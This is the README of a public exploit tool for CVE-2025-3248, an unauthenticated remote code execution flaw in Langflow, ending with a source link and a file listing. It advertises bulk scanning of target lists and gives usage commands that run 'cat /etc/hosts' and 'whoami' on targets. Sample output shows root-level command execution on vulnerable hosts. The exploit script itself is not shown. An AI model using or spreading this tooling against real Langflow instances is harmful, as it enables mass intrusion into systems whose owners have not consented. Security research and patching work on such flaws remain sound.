# Langflow CVE-2025-3248 Exploit
A Python-based exploit for CVE-2025-3248, which allows remote and unauthenticated attackers to execute arbitrary code on vulnerable Langflow instances through crafted HTTP requests.
## Features
- Single URL or bulk scanning from file
- Automatic vulnerability detection
- Command execution capability
- Detailed output with timing information
- Results saved to separate files for vulnerable and non-vulnerable targets
- Benchmark statistics for scan performance
## Usage
### Single URL Scan
```bash
python CVE-2025-3248.py http://target-url -c "cat /etc/hosts"
```
### Bulk Scan from File
```bash
python CVE-2025-3248.py -f targets.txt
```
### Custom Command Execution
```bash
python CVE-2025-3248.py -f targets.txt -c "whoami"
```
## Example Output
```
[*] Progress: 1/10 URLs checked
[*] Checking https://example.com
[+] Vulnerable - Command Output:
uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------
[*] Scan Summary:
[+] Total URLs checked: 10
[+] Vulnerable URLs: 3
[+] Not Vulnerable URLs: 7
[*] Total scan time: 25.34s
[*] Results saved to files with timestamp
```
source: https://github.com/verylazytech
[4.0K] /data/pocs/adf3595f48ffc00759dde65769bb6d9ccfaf0b97
├── [5.8K] CVE-2025-3248.py
└── [1.2K] README.md
0 directories, 2 files